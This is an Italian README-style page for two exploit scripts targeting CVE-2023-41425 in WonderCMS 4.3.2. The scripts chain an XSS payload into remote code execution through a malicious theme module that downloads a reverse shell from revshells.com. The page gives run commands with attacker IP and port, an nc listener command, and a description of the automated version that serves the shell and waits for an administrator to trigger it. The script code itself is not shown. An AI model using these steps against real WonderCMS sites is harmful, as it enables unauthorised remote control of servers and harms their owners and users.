
CVE-2023-41425 Refurbish
Questi script sfruttano una vulnerabilità XSS (Cross-Site Scripting) in WonderCMS 4.3.2 per ottenere Esecuzione Remota di Codice (RCE). Il payload XSS, quando innescato dall'amministratore, installa automaticamente una reverse shell sul server target sfruttando un modulo tematico malevolo creato ad hoc. La reverse shell viene ottenuta da revshells.com ed eseguita, concedendo all'attaccante accesso remoto al server.
Per eseguire con successo uno dei due script, sono necessari i seguenti strumenti e condizioni:
Pasted image 20241010021603
Questa versione dell'exploit controlla automaticamente la presenza di un listener nc attivo, scarica la reverse shell, avvia il server HTTP, invia il payload e attende che l'amministratore inneschi la reverse shell.
nc sia in esecuzione sulla porta specificata:
nc -nvlp <PORT>
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
revshells.com.Pasted image 20241010013048
Utilizza l'exploit fornito dallo script nel campo Sito web...
Pasted image 20241010013218
Questa versione richiede che l'utente gestisca manualmente il listener nc e l'innesco del payload XSS. È più adatta per scenari in cui i processi automatici non sono desiderabili.
nc sia in esecuzione sulla porta specificata:
nc -nvlp <PORT>
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
revshells.com.